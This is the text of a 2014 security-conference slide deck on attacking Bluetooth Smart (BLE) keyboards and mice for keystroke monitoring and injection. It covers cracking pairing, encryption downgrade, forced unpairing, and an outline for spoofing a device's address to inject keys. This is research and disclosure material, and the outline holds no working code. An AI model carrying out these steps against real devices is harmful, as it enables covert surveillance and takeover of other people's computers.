Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

1

NSA Playset: Bluetooth Smart

Mike RyaniSEC Partners

Hack In The Box MalaysiaOctober 16, 2014

A presentation in five acts

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

2

Standard Note

Bluetooth Smart == BLE

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

3

Act I

THE NSA PLAYSET

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

4

The NSA Playset

⇀ NSA ANT catalog⇀ Sweet codenames!

⇁ DEITYBOUNCE⇁ NIGHTSTAND

⇀ Playset codenames⇁ TWILIGHTVEGETABLE⇁ SLOTSCREAMER⇁ DUCHESSRIDE

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

5

Bluetooth Capabilities

⇀ Ubertooth⇀ Crackle⇀ BlueZ

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

6

Capabilities: Ubertooth

⇀ Discovering undiscoverable devices⇀ Rudimentary classic BT sniffing⇀ Robust BLE sniffing⇀ (WIP) BLE transmit

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

7

Capabilities: Crackle

⇀ Cracking BLE key exchange⇀ Decrypting data

Needs to be paired with a sniffer, like Ubertooth

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

8

Capabilities: BlueZ

⇀ Fully functional BR and BLE stack⇀ Able to act as master AND slave (BLE)⇀ Multipurpose utilities: recon

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

9

Existing Capabilities

⇀ Not bad for zero effort!

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

10

ANT Catalog: Bluetooth

⇀ Even the NSA doesn't care about Bluetooth⇁ Yeah, right

⇀ We don't have the full catalog⇀ Ellisys

⇁ more like elli$y$ amirite

ABSENT?!

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

11

Implied Bluetooth Capabilities

⇀ Headset interception⇀ Surveillance of movement (tracking)⇀ Stack exploitation / RCE⇀ Keyboards → Now we're talking!

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

12

Keyboards and Mice

⇀ Keystroke surveillance⇀ Keystroke injection (BlueDucky?)

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

13

TINYALAMO

⇀ Keystroke injection!⇀ Duckyscript!

DEMO

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

14

What just happened?

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

15

Act II

BLE PRIMER

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

16

BLE in a nutshell

⇀ Master and slave⇀ Advertising

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

17

Advertising Data

⇀ BD ADDR: 48-bits⇀ 16-bit Service UUIDs: 0x1812 (HID service)⇀ Appearance: 962 (Mouse)⇀ Complete Local Name: Bad Mouse

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

18

BLE in a nutshell

⇀ Master and slave⇀ Advertising⇀ Link layer connections⇀ Pairing and encryption⇀ HID

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

19

Act III

TARGETS

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

20

Targets

OS must support HID over GATT⇀ Android 4.4 (Bluedroid)⇀ iOS 7/8 (iPad only)⇀ Mac OS 10.9+⇀ Linux / BlueZ 5 (Fedora 20, Arch, NOT Ubuntu)⇀ Windows 8 and Windows Phone 8

Not supported: BB 10, Android < 4.4

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

21

Do BLE Keyboards Exist?

⇀ Yes, finally! (I think)⇀ BLE mice totally exist

HID is HID is HID

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

22

HID Encryption

⇀ HID spec requires encryption⇀ Link layer authenticated encryption⇀ Pairing != Encryption

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

23

Act IV

BLE ATTACKS

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

24

Encryption Attacks

⇀ Crack encryption, recover key⇀ Exploit implementation flaw

⇁ Encryption downgrade⇁ Opportunistic downgrade⇁ Forced re-pairing

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

25

Crack Encryption

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

26

Crack Encryption

⇀ Least invasive⇀ Downside: Must observe pairing⇀ Bonus: keystroke surveillance

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

27

Opportunistic Downgrade

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

28

Opportunistic Downgrade

⇀ More invasive⇀ Distinguishable from legit keyboard⇀ Relies on OS bugs

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

29

Forced Unpairing

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

30

Forced Unpairing

⇀ Most invasive⇀ Least broadly applicable

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

31

Naming Names

⇀ Not yet!⇀ Two out of five OSes are vulnerable

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

32

Act V

BUILDING THE ATTACKS

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

33

Ingredients

⇀ Regular Bluetooth dongle⇀ HCI_USER_SOCKET⇀ Scapy⇀ PyBT⇀ Wee bit of Python glue⇀ Ubertooth (optional)

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

34

HCI and HCI_USER_SOCKET

⇀ All Bluetooth dongles speak HCI⇀ You can sniff this with recent Wireshark⇀ You can send totally illegal stuff this way⇀ HCI_USER_SOCKET – speak HCI from userspace

⇁ Linux 3.13 – all recent distros!

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

35

Scapy

⇀ Framework for constructing packets⇀ Added extensive Bluetooth support

⇁ HCI, L2CAP, SM, ATT, GATT⇁ s = BluetoothUserSocket()

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

36

PyBT

⇀ I accidentally a Bluetooth stack⇀ BLE, SM (pairing), key management⇀ GATT client and server⇀ Roles: Central and Peripheral⇀ central = LE_Central()

⇀ periph = LE_Peripheral()

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

37

Ubertooth

⇀ Pull host and HID device addresses out of the air⇀ Nobody uses BLE private addresses correctly⇀ Nobody⇀ Not always necessary (hcitool lescan)

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

38

Putting it all together

⇀ Ubertooth grabs BD ADDR⇀ Launch PyBT

⇁ Talks to dongle via HCI_USER_SOCKET⇁ Builds packets with Scapy

⇀ Advertise with address of mouse⇀ Wait for connection, send “no key” message⇀ Profit!

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

39

URL ME BRO

⇀ https://github.com/mikeryan/PyBT⇀ https://bitbucket.org/mikeryan1/scapy

⇀ Older stuff⇁ https://github.com/mikeryan/crackle⇁ https://github.com/greatscottgadgets/ubertooth

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

40

Thanks

⇀ Marcel Holtmann⇀ Mike Ossmann / Dominic Spill / Ubertooth team⇀ Marcel Holtmann

⇀ Hack In The Box!

41

Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014

41

Thank You

Mike Ryan

@mpeg4codec

mikeryan@isecpartners.com

https://lacklustre.net/